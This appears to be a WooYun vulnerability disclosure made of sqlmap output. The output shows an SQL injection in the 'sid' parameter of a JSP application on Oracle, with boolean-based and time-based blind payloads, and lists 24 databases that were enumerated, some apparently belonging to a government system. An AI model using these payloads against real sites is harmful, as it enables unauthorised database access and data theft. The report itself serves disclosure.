WooYun.org

下面是一些信息。

<hr /> <br /> <br />

sqlmap identified the following injection points with a total of 81 HTTP(s) requests:
---
Place: GET
Parameter: sid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sid=40288b9515d10dd60115d11100bd0006' AND 6261=6261 AND 'vHdT'='vHdT
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: sid=40288b9515d10dd60115d11100bd0006' AND 5017=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'bbJO'='bbJO
---
web application technology: JSP
back-end DBMS: Oracle
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: sid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sid=40288b9515d10dd60115d11100bd0006' AND 6261=6261 AND 'vHdT'='vHdT
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: sid=40288b9515d10dd60115d11100bd0006' AND 5017=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'bbJO'='bbJO
---
web application technology: JSP
back-end DBMS: Oracle
available databases [24]:
[*] CHAT
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] GXGOVXXGK
[*] GXQM
[*] GXTZ
[*] GXZW
[*] GXZWW
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] YQRJY
[*] ZZGX
[*] ZZGXBBS